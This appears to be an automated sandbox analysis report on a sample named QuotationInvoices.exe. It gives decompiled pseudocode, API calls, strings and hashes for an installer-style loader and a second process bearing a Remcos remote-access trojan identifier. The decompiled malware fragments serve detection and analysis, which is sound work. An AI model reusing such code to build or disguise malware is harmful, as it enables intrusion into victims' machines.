Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405BE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BE5(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x00405be6
0x00405bfd
0x00405c05
0x00405c05
0x00405c0d

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BF4
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE5

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040396E, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040396E() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2b0
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x29c
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039CB();
				return E00405A15(_t11, "C:\\Users\\jones\\AppData\\Local\\Temp\\nsc875C.tmp", 7);
			}

0x0040396e
0x0040397d
0x00403980
0x00403982
0x00403982
0x00403989
0x00403991
0x00403994
0x00403996
0x00403996
0x00403996
0x0040399d
0x004039af

APIs

CloseHandle.KERNEL32(000002B0,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
CloseHandle.KERNEL32(0000029C,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994

Strings

C:\Users\user\AppData\Local\Temp\nsc875C.tmp, xrefs: 004039A4
C:\Users\user\AppData\Local\Temp\, xrefs: 00403973

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsc875C.tmp
API String ID: 2962429428-1954034171
Opcode ID: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
Instruction ID: e02401a4112a94a9765f7fc85388a0ec9ec9dd0d4867be743f4f38008bc29606
Opcode Fuzzy Hash: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
Instruction Fuzzy Hash: 36E08C71910714A6C124AF7CAE8E8853B285B893357208726F078F20F0C7789AA74EAD

Uniqueness

Uniqueness Score: -1.00%

Function 004052E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a8a4 = _t16;
							E00404CA4();
						}
						L11:
						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C24(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040431D(0x413);
				return 0;
			}

0x004052ec
0x004052f6
0x00405312
0x00405334
0x00405337
0x0040533d
0x00405347
0x00405348
0x0040534a
0x00405350
0x00405350
0x0040535a
0x00000000
0x00405368
0x0040531f
0x00405357
0x00405357
0x00000000
0x00405357
0x0040532b
0x0040532d
0x00000000
0x0040532d
0x004052fc
0x00000000
0x00000000
0x00405303
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405317
CallWindowProcA.USER32 ref: 00405368

Part of subcall function 0040431D: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040432F

Strings

, xrefs: 004052F8

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E

Uniqueness

Uniqueness Score: -1.00%

Function 00406134, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406142
0x00406144
0x0040615c
0x00406161
0x00406166
0x004061a3
0x004061a3
0x00406168
0x0040617a
0x00406185
0x0040618b
0x00406195
0x00000000
0x00000000
0x00406195
0x004061a8

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,0042A098,?,?,?,00000002,Call,?,004063E9,80000002), ref: 0040617A
RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A098), ref: 00406185

Strings

Call, xrefs: 00406137, 0040616B

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004058EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058EC(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0c0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004058f5
0x00405915
0x0040591d
0x00405922
0x00000000
0x00405928
0x0040592c

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0C0,Error launching installer), ref: 00405915
CloseHandle.KERNEL32(?), ref: 00405922

Strings

Error launching installer, xrefs: 004058FF

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
Instruction ID: c507ec532ebc7345b5619acd619b8ed9e71e93050b60d9e59510cdc0b01a46da
Opcode Fuzzy Hash: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
Instruction Fuzzy Hash: 52E0BFF5600209BFEB109BA5ED45F7F77ADFB04608F404525BD50F2150D77499158A78

Uniqueness

Uniqueness Score: -1.00%

Function 00405C2C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C2C(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405c2d
0x00405c37
0x00405c39
0x00405c40
0x00405c48
0x00000000
0x00000000
0x00000000
0x00405c48
0x00405c4a
0x00405c4f

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QuotationInvoices.exe,C:\Users\user\Desktop\QuotationInvoices.exe,80000000,00000003), ref: 00405C32
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QuotationInvoices.exe,C:\Users\user\Desktop\QuotationInvoices.exe,80000000,00000003), ref: 00405C40

Strings

C:\Users\user\Desktop, xrefs: 00405C2C

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: 4ba3b1558e7d02da59ab85be258a456d7b40e7fb12288d653d4debc9d62610ac
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: 2FD0A76240CA706EF30366108C00B8F6A48DF13301F0900A6F081A2190C3BC4C424BFD

Uniqueness

Uniqueness Score: -1.00%

Function 6FC510E0, Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6FC510E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x6fc5405c = _a8;
				 *0x6fc54060 = _a16;
				 *0x6fc54064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6fc54038, E6FC51556, _t52);
				_t43 =  *0x6fc5405c +  *0x6fc5405c * 4 << 2;
				_t17 = E6FC5123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E6FC51266(E6FC512AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E6FC512D1( *_t55 - 0x30, E6FC5123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x6fc54030;
								 *0x6fc54030 = _t31;
								E6FC51508(_t31 + 4,  *0x6fc54064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x6fc54030;
							if( *0x6fc54030 != 0) {
								E6FC51508( *0x6fc54064, _t34 + 4, _t43);
								_t37 =  *0x6fc54030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x6fc54030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x6fc510e7
0x6fc510ef
0x6fc51103
0x6fc5110b
0x6fc51116
0x6fc51119
0x6fc51121
0x6fc51124
0x6fc51126
0x6fc511c4
0x6fc511d0
0x6fc5112c
0x6fc5112d
0x6fc5112d
0x6fc51130
0x6fc51131
0x6fc51134
0x6fc51203
0x6fc51206
0x6fc5119e
0x6fc511a4
0x6fc511ac
0x6fc511b1
0x6fc511b4
0x00000000
0x6fc511b4
0x6fc51209
0x6fc5120a
0x6fc51186
0x6fc5118c
0x6fc51194
0x00000000
0x6fc51194
0x6fc51152
0x6fc51153
0x6fc5115b
0x6fc51168
0x6fc51170
0x6fc51179
0x6fc5117e
0x6fc5117e
0x00000000
0x6fc51153
0x6fc5113a
0x6fc511d1
0x6fc511d1
0x6fc511d8
0x6fc511e5
0x6fc511ea
0x6fc511ef
0x6fc511f5
0x6fc511fb
0x6fc511fb
0x00000000
0x6fc511d8
0x6fc51140
0x6fc51143
0x00000000
0x00000000
0x6fc51149
0x6fc5114c
0x6fc5119b
0x00000000
0x6fc5119b
0x6fc5114f
0x6fc51150
0x6fc51183
0x00000000
0x6fc51183
0x00000000
0x6fc511ba
0x6fc511ba
0x00000000
0x6fc511c3

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6FC5115B
GlobalFree.KERNEL32 ref: 6FC511B4
GlobalFree.KERNEL32 ref: 6FC511C7
GlobalFree.KERNEL32 ref: 6FC511F5

Memory Dump Source

Source File: 00000000.00000002.667341894.000000006FC51000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: true

Associated: 00000000.00000002.667322660.000000006FC50000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667363580.000000006FC53000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667372496.000000006FC55000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 3e5add16000454cf141c2a6349a38647bed549df4cd29fb41401cc8e6f8fc4cf
Instruction ID: beea8a9f346b214470f3c0593bb65e53f62bc6c40d8278bd54a60040a650947f
Opcode Fuzzy Hash: 3e5add16000454cf141c2a6349a38647bed549df4cd29fb41401cc8e6f8fc4cf
Instruction Fuzzy Hash: 4631E4B1404646AFEF008F7CD99CA677FF9FB86260B240156EA55E6250F734D838CB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405D4B, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405d5b
0x00405d5d
0x00405d60
0x00405d8c
0x00405d65
0x00405d6e
0x00405d73
0x00405d7e
0x00405d81
0x00405d9d
0x00405d83
0x00405d8a
0x00000000
0x00405d8a
0x00405d96
0x00405d9a
0x00405d9a
0x00405d94
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
CharNextA.USER32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D84
lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: QuotationInvoices.exe PID: 7072 Parent PID: 7036 QuotationInvoices.exeCOMMON

Executed Functions

Function 0040CEAE, Relevance: 77.1, APIs: 26, Strings: 18, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CEAE() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t22;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x46ad28 = _t2;
				if(_t2 == 0) {
					 *0x46ad28 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x46ad20 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x46ad28 == 0) {
					 *0x46ad20 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x46ad14 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x46aea8 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x46aeac = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x46ad24 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x46ad18 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x46ad2c = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x46ad30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x46ad1c = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x46ad10 = _t22;
				return _t22;
			}

0x0040cec1
0x0040ceca
0x0040ced2
0x0040ced9
0x0040ceea
0x0040ceea
0x0040cf05
0x0040cf0a
0x0040cf1b
0x0040cf1b
0x0040cf39
0x0040cf4d
0x0040cf61
0x0040cf75
0x0040cf89
0x0040cf9d
0x0040cfb1
0x0040cfc2
0x0040cfca
0x0040cfce
0x0040cfd4

APIs

LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,0046B558,Remcos-I9UILL,00000001,0040C4EC), ref: 0040CEC1
GetProcAddress.KERNEL32(00000000), ref: 0040CECA
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CEE5
GetProcAddress.KERNEL32(00000000), ref: 0040CEE8
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CEF9
GetProcAddress.KERNEL32(00000000), ref: 0040CEFC
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CF16
GetProcAddress.KERNEL32(00000000), ref: 0040CF19
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CF2A
GetProcAddress.KERNEL32(00000000), ref: 0040CF2D
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CF3E
GetProcAddress.KERNEL32(00000000), ref: 0040CF41
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CF52
GetProcAddress.KERNEL32(00000000), ref: 0040CF55
GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CF66
GetProcAddress.KERNEL32(00000000), ref: 0040CF69
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CF7A
GetProcAddress.KERNEL32(00000000), ref: 0040CF7D
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CF8E
GetProcAddress.KERNEL32(00000000), ref: 0040CF91
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CFA2
GetProcAddress.KERNEL32(00000000), ref: 0040CFA5
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CFB6
GetProcAddress.KERNEL32(00000000), ref: 0040CFB9
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CFC7
GetProcAddress.KERNEL32(00000000), ref: 0040CFCA

Strings

user32, xrefs: 0040CF84, 0040CF98, 0040CFAC
kernel32, xrefs: 0040CF34, 0040CF48, 0040CF70
EnumDisplayMonitors, xrefs: 0040CF93
GlobalMemoryStatusEx, xrefs: 0040CF20
Psapi.dll, xrefs: 0040CEBC, 0040CEF4
IsUserAnAdmin, xrefs: 0040CF57
Shell32, xrefs: 0040CF5C
Kernel32.dll, xrefs: 0040CEE0, 0040CF11
IsWow64Process, xrefs: 0040CF2F
SetProcessDEPPolicy, xrefs: 0040CF6B
GetMonitorInfoW, xrefs: 0040CFA7
Shlwapi.dll, xrefs: 0040CFBD
EnumDisplayDevicesW, xrefs: 0040CF7F
GetModuleFileNameExW, xrefs: 0040CEEF, 0040CF0C
GetModuleFileNameExA, xrefs: 0040CEB7, 0040CEDB
GetComputerNameExW, xrefs: 0040CF43
kernel32.dll, xrefs: 0040CF25
Remcos-I9UILL, xrefs: 0040CEB5

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$Remcos-I9UILL$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
API String ID: 551388010-1048579472
Opcode ID: ce650935286e439547cb14a4325621db24ed031be4c769f4698fb39bd9379722
